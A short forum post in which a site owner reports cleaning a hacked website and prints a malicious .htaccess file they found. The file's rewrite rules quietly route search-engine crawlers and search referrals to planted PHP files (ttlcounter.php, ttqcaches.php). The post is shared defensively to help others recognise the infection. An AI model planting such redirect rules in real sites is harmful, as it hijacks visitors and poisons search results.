Following the guide and with a little bit of research I was able to de-hack the website. Everything seems to be back in order.
I have found the ‘hack’ in two locations: root directory and theme directory. In the theme directory function.php was infected, and in root directory there were two new files .htaccess.backup and ttlcounter.php. This is the code from .htaccess.backup:
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|bing|yahoo|msn|aol|duckduck) [OR]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo|msn|aol|duckduck)
RewriteRule ^(.*)$ ttqcaches.php?$1 [L]
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|bing|yahoo|msn|aol|duckduck) [OR]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo|msn|aol|duckduck)
RewriteRule ^(.*)$ ttlcounter.php?$1 [L]
Hopefully this information helps someone with the similar problem.
Cheers!
Thanks for the quick reply. I will try with the guide!
